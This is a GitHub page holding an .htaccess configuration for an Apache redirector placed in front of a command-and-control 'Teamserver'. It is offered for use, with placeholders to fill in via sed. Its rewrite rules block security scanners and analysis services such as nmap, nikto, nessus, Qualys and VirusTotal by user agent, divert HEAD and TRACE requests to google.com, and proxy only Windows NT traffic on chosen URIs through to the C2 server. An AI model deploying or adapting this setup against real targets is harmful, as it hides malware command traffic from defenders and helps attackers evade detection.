-
Notifications
You must be signed in to change notification settings - Fork 0
/
.htaccess
83 lines (68 loc) · 4.29 KB
/
.htaccess
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#Based on:https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10 and https://bluescreenofjeff.com
#Change with sudo sed -i -e 's/{TERM TO LOOK FOR}/{TERM TO REPLACE WITH}/g'
#Also if you dont want the whitelist page to be replaceme_Allowed you need to sed change that also
#REF: https://bluescreenofjeff.com/2016-12-23-apache_mod_rewrite_grab_bag/
RewriteEngine on
RewriteOptions Inherit
ServerSignature Off
#FallbackResource 404.html
RewriteCond %{REQUEST_METHOD} !^(GET|POST)
RewriteRule ^.*$ http://google.com [L,R=302]
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE)
RewriteRule ^.*$ http://google.com [L,R=302]
#Forcing HTTPS
#RewriteCond %{HTTPS} !=on [NC]
#RewriteRule ^.*$ https://replaceme%{REQUEST_URI} [L,R=301]
## Uncomment to enable verbose debugging in /var/logs/apache2/error.log
#LogLevel alert rewrite:trace5
#Whitelisted Cert Validation Services
RewriteCond %{HTTP_USER_AGENT} "COMODO DCV" [NC]
RewriteRule ^.*$ index.html [L]
#Time based access
#RewriteCond %{TIME_HOUR}%{TIME_MIN} <0600
#RewriteCond %{TIME_HOUR}%{TIME_MIN} >1800
#RewriteRule ^.*$ 404.html [L]
#Day of week based access
#RewriteCond %{TIME_WDAY} =0
#RewriteCond %{TIME_WDAY} =6
#RewriteRule ^.*$ 404.html [L]
#BLACKLISTED USER AGENT STRINGS
RewriteCond %{HTTP_USER_AGENT} "HTTP|Nimbostratus-Bot|rv:x.x.x|.NET CLR|bits|googleweblight|WindowsPowerShell|.net|Headless|Headlesschrome|Windows NT 6.1|Ubuntu|Bot|python|python-requests|java|linux|wget|curl|CLR|OpenBSD|git|Go-http|Safari|Macintosh|OS X|Cisco|BingPreview|iPhone|android|Nexus|blackberry|googlebot-mobile|iemobile|ipad|iphone|ipod|opera mobile|palmos|webos|kindel|kindal|SamsungBrowser|HeadlessChrome|DingTalk|compatible|Opera|zh-cn|Mac|InfoPath|MSIE|X11|Darwin|Presto|CampNet|adobe|BlackWidow|Banner|Dalvik|ChinaClaw|Custo|DISCo|eCatch|EirGrabber|EmailSiphon|EmailWolf|WebPictures|ExtractorPro|EyeNetIE|GetWeb|GetRight|Zeus|SiteSnagger|SuperBot|SuperHTTP|Surfbot|WebAuto|WebCopier|WebSpider|zgrab|X11|Googlebot|virustotalcloud|Gh0st|OS x|Lynx|Slackbot|nmap|cloudfront|clshttp|archiver|sparta|loader|email|nikto|nessus|rapid|Qualys|vas|miner|HTTrack|crawl|shell|yahoo|google|bot|b\-o\-t|spider|baidu" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} =""
RewriteRule ^.*$ index.html [L]
#BLACKLISTED OS ID
#RewriteCond %{QUERY_STRING} os_id=unknown
#RewriteCond %{QUERY_STRING} os_id=linux
#RewriteCond %{QUERY_STRING} os_id=unix
#RewriteCond %{QUERY_STRING} os_id=mac
#RewriteRule ^.*$ 404.html [L]
#Prevent image hotlinking
#RewriteCond %{HTTP_REFERER} !^$
#RewriteCond %{HTTP_REFERER} !^http://(www\.)?example\.com/ [NC]
#RewriteRule \.(gif|jpg|jpeg|png)$ - [F]
## C2 Traffic (HTTP-GET, HTTP-POST, HTTP-STAGER URIs)
## Logic: If a requested URI AND the User-Agent matches, proxy the connection to the Teamserver
## Consider adding other HTTP checks to fine tune the check. (HTTP Cookie, HTTP Referer, HTTP Query String, etc)
## Only allow GET and POST methods to pass to the C2 server
RewriteCond %{REQUEST_METHOD} ^(GET|POST) [NC]
#WhiteListed OS ID
#RewriteCond %{QUERY_STRING} os_id=windows
RewriteCond %{REQUEST_URI} ^(/{URI_TO_ALLOW}.*|/{URI_TO_ALLOW}.*)$ [NC]
RewriteCond %{HTTP_USER_AGENT} "Windows NT" [NC]
#RewriteCond %{HTTP_COOKIE} {COOKIE_VALUE_TO_ALLOW}
RewriteRule ^.*$ "http://replaceme_Allowed%{REQUEST_URI}" [P,L]
#ErrorDocument 500 404.html
#ErrorDocument 403 404.html
#ErrorDocument 408 404.html
#Redirect windows browser here
RewriteCond %{REQUEST_FILENAME} -f [NC]
RewriteCond %{HTTP_USER_AGENT} "Windows NT" [NC]
RewriteRule ^.*$ index.html [L]
RewriteCond %{REQUEST_FILENAME} -d
RewriteCond %{HTTP_USER_AGENT} "Windows NT" [NC]
RewriteRule ^.*$ index.html [L]
RewriteCond %{REQUEST_FILENAME} -l
RewriteCond %{HTTP_USER_AGENT} "Windows NT" [NC]
RewriteRule ^.*$ index.html [L]
ErrorDocument 404 404.html
RewriteRule ^.*$ 404.html [L]